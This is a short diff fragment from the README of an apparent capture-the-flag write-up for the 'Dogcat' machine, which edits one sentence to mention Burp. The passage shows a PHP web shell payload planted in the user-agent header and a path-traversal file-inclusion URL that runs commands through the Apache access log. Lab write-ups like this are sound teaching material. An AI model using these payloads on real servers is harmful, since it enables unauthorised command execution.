nickswink/Dogcat-Writeup/README.md

 ```
 * Include the 'ext' so that it won't add the php extension to the end.

 The access.log included ip, time, request, and user-agent information.
-I sent a modified request where I made the user-agent = `<?php system($_GET['cmd']);?>` This way when we navigate to access.log we can pass in a parameter 'cmd' which will execute commands on the system.
+I sent a modified request using Burp where I made the user-agent = `<?php system($_GET['cmd']);?>` This way when we navigate to access.log we can pass in a parameter 'cmd' which will execute commands on the system.

 ```?view=./dog/../../../../../../../var/log/apache2/access.log&ext&cmd=whoami```